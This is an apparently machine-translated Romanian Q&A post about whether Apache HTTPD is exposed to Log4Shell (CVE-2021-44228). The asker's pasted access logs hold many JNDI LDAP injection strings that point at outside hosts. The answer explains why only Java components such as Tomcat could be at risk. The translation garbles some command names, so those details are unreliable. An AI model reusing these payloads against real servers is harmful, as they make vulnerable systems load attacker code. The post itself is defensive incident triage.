Serverul web Apache folosește log4j (CVE-2021-44228)?

Serverul web apache (apache2) folosește log4j?

Am Apache2 2.4.38 (debian) instalat pe sistemul de operare Raspberry Pi (64 de biți) și am găsit câteva înregistrări ciudate în jurnalul meu cu privire la CVE-2021-44228 din kryptoslogic-cve-2021-44228.com (pot de miere/scaner), dataastatistics.com (offline și rău intenționat?) și a8fvkc.dnslog.cn (nu stiu ce este asta)

Ce ar trebui să fac acum?

• nimic pentru că apache2 nu este afectat de CVE-2021-44228
• formatați totul și așteptați câteva zile înainte de a instala o versiune corectivă
• „verificați” dacă există fișiere .class noi și dacă nu există, continuați operarea (și utilizați patch-uri manuale precum log4j2.formatMsgNoLookups = ADEVĂRAT
• altceva

Jurnalele:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228 .com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] „GET / HTTP/1.1” 200 5932 „http://79.232.126.49/” „${jndi:ldap://http80useragent. kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] „GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1” 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] „GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1” 8456 „http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D” „Kryptos Logic Telltale”
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] „GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1” 8456 „http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D” „Kryptos Logic Telltale”
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228 .com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] „GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1” 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] „GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] „GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] „GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] „POST /api/v2 HTTP/1.1” 400 5115 „${jndi:ldap://[*****mydomain** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] „POST /api/v2 HTTP/1.1” 400 5115 „${jndi:ldap://[*****mydomain** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] „GET / HTTP/1.1” 301 568 „-” „${jndi:ldap://a8fvkc.dnslog.cn/a}”
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] „GET / HTTP/1.1” 200 6576 „-” „${jndi:ldap://a8fvkc.dnslog.cn/a}”
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] „GET /favicon.ico HTTP/1.1” 200 7103 „-” „${jndi:ldap://a8fvkc.dnslog.cn/ A}"

Apache în sine nu este scris în Java și nu face legătura directă cu infama bibliotecă Log4j. Este deosebit de ferit de această vulnerabilitate.

Ce altceva poate merge prost, atunci?

1. Nu totul cu Apache în numele său și funcțiile HTTP este exact cel Server Apache HTTPD.Apache Tomcat, de exemplu, este un server web HTTP complet diferit. Este scris în Java și poate fi configurat să folosească Log4J. Nu sunt cu adevărat sigur dacă este deloc posibil să vă logați altfel în Tomcat.

Cineva cu mai puțină experiență și cunoștințe este perfect capabil să-i înșele pe cei doi. Și, din câte știu, Tomcat are, în general, un istoric de securitate mai bun decât HTTPD-ul Apache „clasic”.

(După comentariul lui Bob, facilitate implicită de înregistrare în Tomcat nu este Log4J.)

2. Apache HTTPD este foarte extensibil. Poate fi configurat pentru a apela alte lucruri în fundal prin varietatea de interfețe (de exemplu, pentru a prelua pagini web dinamice care sunt generate programatic). Unele dintre aceste „lucruri din fundal” pot fi bazate pe java și legate la biblioteca Log4J.

Kilometrajul dvs. poate varia, mai ales dacă nu vă cunoașteți în detaliu stiva dvs. de software.

Pentru a fi sigur, ar trebui să verificați mai întâi dacă aveți instalată vreo mașină Java. În managerul dvs. de pachete, pachetele sale vor fi numite JRE-ceva, JVM-ceva sau poate JAVA-ceva.

Puteți încerca la fel de bine:

versiunea java

în carapacea ta.

Dacă nu aveți niciunul dintre acestea și nu ați instalat JAVA în afara managerului de pachete, sunteți în siguranță.

Nu este sigur în general, dar cel puțin împotriva CVE-2021-44228.